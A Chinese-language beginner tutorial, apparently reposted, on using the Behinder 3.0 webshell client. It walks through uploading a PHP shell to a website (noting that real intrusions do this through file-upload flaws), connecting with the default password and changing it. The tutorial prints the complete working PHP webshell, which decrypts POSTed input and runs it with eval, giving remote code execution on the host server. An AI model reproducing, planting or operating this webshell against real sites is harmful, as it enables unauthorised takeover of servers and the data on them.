冰蠍3.0初體驗


這篇文章比較基礎,主要面向新手,技術含量較低主要為操作流程。


0x01. 冰蠍是什么

利用動態二進制加密實現新型一句話木馬的客戶端 , 相對於菜刀和蟻劍他的數據是加密傳輸的

1.1 下載

github地址: https://github.com/rebeyond/Behinder/releases

下載后的文件

image-20210210102351676

server文件中放的是各種語言的webshell,如下圖:

image-20210210102429139

Behinder_v3.0_Beta6_win.jar是客戶端 , 雙擊就能打開 , 但是要有java環境 , 下圖是我的java環境

image-20210210102637880

data.db是數據庫相關文件 , 最下面更新日志文件

0x02. 連接webshell

2.1 環境准備

這里我就簡單演示 , 直接在本機電腦上啟動phpstudy

http://192.168.1.106/

image-20210210102942366

手動將php的shell上傳到網站上 , 實際滲透過程中是通過文件上傳 , 將shell.php上傳到對方網站中

http://192.168.1.106/muma/shell.php

image-20210210103155501

2.2 打開客戶端連接

雙擊Behinder_v3.0_Beta6_win.jar , 打開之后就是以下畫面

image-20210210103351849

右鍵 ---> 新增 , 依次輸入shell的信息 , 默認密碼 : rebeyond

image-20210210103523029

進行連接

image-20210210103641860

連接成功

0x03. 默認密碼修改

冰蠍的作者應該很喜歡beyond的歌曲 ( 我猜的 ) , 所以連接shell的默認密碼為 rebeyond

打開shell.php , 在源碼中可以看到

<?php
@error_reporting(0);
session_start();
        $key="e45e329feb5d925b"; //該密鑰為連接密碼32位md5值的前16位,默認連接密碼rebeyond
	$_SESSION['k']=$key;
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __invoke($p) {eval($p."");}}
    @call_user_func(new C(),$params);
?>

該密鑰為連接密碼32位md5值的前16位,默認連接密碼rebeyond

如果你想修改連接密碼只需要替換掉先前md5的前16位 , 比如更改連接密碼為admin

image-20210210104125905

$key="21232f297a57a5a7"; //該密鑰為連接密碼32位md5值的前16位,連接密碼admin

然后替換源文件中的這一句代碼 , 保存並退出 , 這樣以后的shell.php的鏈接密碼為admin

冰蠍客戶端的詳情介紹 : https://xz.aliyun.com/t/2799


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM